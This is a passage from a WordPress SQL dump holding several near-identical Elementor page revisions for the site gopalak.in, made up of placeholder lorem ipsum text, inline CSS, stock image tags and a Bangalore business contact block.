sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:03','2022-09-30 06:14:03','',1373,'https://gopalak.in/?p=1476',0,'revision','',0),(1477,1,'2022-09-30 11:44:32','2022-09-30 06:14:32','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:32','2022-09-30 06:14:32','',1373,'https://gopalak.in/?p=1477',0,'revision','',0),(1478,1,'2022-09-30 11:44:32','2022-09-30 06:14:32','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:32','2022-09-30 06:14:32','',1373,'https://gopalak.in/?p=1478',0,'revision','',0),(1479,1,'2022-09-30 11:44:32','2022-09-30 06:14:32','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:32','2022-09-30 06:14:32','',1373,'https://gopalak.in/?p=1479',0,'revision','',0),(1480,1,'2022-09-30 11:44:48','2022-09-30 06:14:48','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, 